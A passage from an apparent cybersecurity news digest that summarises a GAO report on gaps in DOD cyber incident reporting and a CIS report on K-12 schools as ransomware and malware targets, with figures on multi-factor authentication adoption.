reported from a high of 3,880 in 2015 to 948 in 2021. However, despite this reduction, the GAO discovered that the DOD's system for reporting all incidents often contained incomplete information, and the DOD could not always demonstrate that relevant critical incidents had been notified to appropriate leadership. This article continues to discuss the GAO report on DOD cybersecurity regarding the need to ensure cyber incidents are appropriately reported and shared.

    HSToday reports "GAO Tells DOD to Ensure Cyber Incidents are Properly Reported and Shared"

  • news

    Visible to the public "K-12 Schools Lack Resources, Remaining Top Target for Cyberattacks"

    According to a new report published by the Center for Internet Security (CIS), the K-12 sector remains a top target for cyberattacks, despite the improvement of security capabilities over time. The CIS report reveals that the education sector lags behind other sectors in cyber maturity due to limited internal resources for defense against threat actors, with nearly a fifth of K-12 schools spending less than 1 percent of their Information Technology (IT) budget on cybersecurity. It also found that 81 percent of K-12 schools do not fully implement multi-factor authentication (MFA), and 29 percent do not use MFA at all. The report follows the US Homeland Security Department's Cybersecurity and Infrastructure Security Agency (CISA) hosting a national summit on K-12 school safety and security to address the sector's complex threats. During the event, Jen Easterly, director of CISA, stated that ransomware is one of the most impactful and persistent threats targeting K-12 schools and districts, which is consistent with the CIS report. CISA recently launched an information channel to share ransomware-related resources in response to the increasing frequency of ransomware attacks. Aside from ransomware threats, the report found that Shlayer and CoinMiner were two of the top malware families targeting K-12 entities in the last year. Shlayer targets Apple macOS devices, acting as a dropper for other macOS malware designed to spam victims with online ads, whereas CoinMiner mines cryptocurrency using Windows Management Instrumentation (WMI). According to Easterly, these threat actors are not "discriminatory" and target schools of all sizes and locations. This article continues to discuss the targeting of K-12 schools by cyberattacks and efforts to improve K-12 sector security against cyberattacks.

    SC Magazine reports "K-12 Schools Lack Resources, Remaining Top Target for Cyberattacks"